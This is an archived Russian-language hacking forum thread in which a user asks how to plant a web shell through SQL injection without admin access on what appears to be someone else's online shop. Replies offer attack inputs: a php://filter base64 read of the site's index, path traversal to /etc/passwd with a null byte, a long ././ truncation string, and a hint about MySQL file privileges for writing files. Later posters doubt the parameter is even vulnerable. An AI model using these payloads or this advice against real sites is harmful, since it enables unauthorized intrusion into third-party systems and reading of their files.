Просмотр полной версии : шелл через sql
Подскажите как можно залить шелл через скулю,не имея доступа к админке.Может есть софт?
.Light. said:
↑ (https://antichat.live/posts/3935314/)
Подскажите как можно залить шелл через скулю,не имея доступа к админке.Может есть софт?
если у пользователя есть доступ к file_priv. это все описано в статьях
Что можно сделать с этим?
Warning: require(includes/languages/.php): failed to open stream: No such file or directory in /home/piercing/data/www//shop/includes/application_top.php on line 291
Fatal error: require(): Failed opening required 'includes/languages/.php' (include_path='.:/usr/local/share/pear') in /home/piercing/data/www//shop/includes/application_top.php on line 291
BigBear said:
↑ (https://antichat.live/posts/3935978/)
Обыкновенная AFR же. С суффиксом, разве что, может быть помучаешься, если MQ on.
%00
././[4096]././
Можно по подробнее?
у вас инклуд или что? покажите полностью запрос и ответ
http://www./shop/info.php?id=1'
Warning: require(includes/languages/.php): failed to open stream: No such file or directory in/home/piercing/data/www//shop/includes/application_top.php on line 291
Fatal error: require(): Failed opening required 'includes/languages/.php' (include_path='.:/usr/local/share/pear') in/home/piercing/data/www//shop/includes/application_top.php on line 291
BabaDook
04.01.2016, 23:00
.Light. said:
↑ (https://antichat.live/posts/3936100/)
http://www./shop/info.php?id=1
'
Warning
: require(includes/languages/.php): failed to open stream: No such file or directory in
/home/piercing/data/www//shop/includes/application_top.php
on line
291
Fatal error
: require(): Failed opening required 'includes/languages/.php' (include_path='.:/usr/local/share/pear') in
/home/piercing/data/www//shop/includes/application_top.php
on line
291
попробуй так
http://www./shop/info.php?id=php://filter/convert.base64-encode/resource= (http://www./shop/info.php?id=1)../index
или так
http://www./shop/info.php?id=../../../etc/passwd (http://www./shop/info.php?id=../../../etc/passwd%00)%00
BabaDook said:
↑ (https://antichat.live/posts/3936114/)
попробуй так
http://www./shop/info.php?id=php://filter/convert.base64-encode/resource= (http://www./shop/info.php?id=1)
../index
или так
http://www./shop/info.php?id=../../../etc/passwd (http://www./shop/info.php?id=../../../etc/passwd%00)
%00
Тоже самое(
Warning: require(includes/languages/.php): failed to open stream: No such file or directory in/home/piercing/data/www//shop/includes/application_top.php on line 291
Fatal error: require(): Failed opening required 'includes/languages/.php' (include_path='.:/usr/local/share/pear') in/home/piercing/data/www//shop/includes/application_top.php on line 291
BabaDook said:
↑ (https://antichat.live/posts/3936114/)
попробуй так
http://www./shop/info.php?id=php://filter/convert.base64-encode/resource= (http://www./shop/info.php?id=1)
../index
или так
http://www./shop/info.php?id=../../../etc/passwd (http://www./shop/info.php?id=../../../etc/passwd%00)
%00
где вы видите, что строка из запроса попадает в include? ошибка всегда одна
BabaDook
05.01.2016, 13:55
yarbabin said:
↑ (https://antichat.live/posts/3936267/)
где вы видите, что строка из запроса попадает в include? ошибка всегда одна
Точно.
Извиняюсь за лже показания, раз yarbabin говорит что нет уязвимости, значит её нету
я не говорю, что её нет, но верно то, что гет параметр id никак не попадает в инклуд
psihoz26
05.01.2016, 19:05
Вангую инклуд после SQLi
psihoz26
05.01.2016, 19:06
BigBear said:
↑ (https://antichat.live/posts/3935978/)
Обыкновенная AFR же. С суффиксом, разве что, может быть помучаешься, если MQ on.
%00
././[4096]././
Require и require_once это lfi
psihoz26 said:
↑ (https://antichat.live/posts/3936402/)
Require и require_once это lfi
Хм, встречал и другие вариации, когда только AFR. Я не путаю с readfile(), там реально был require
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot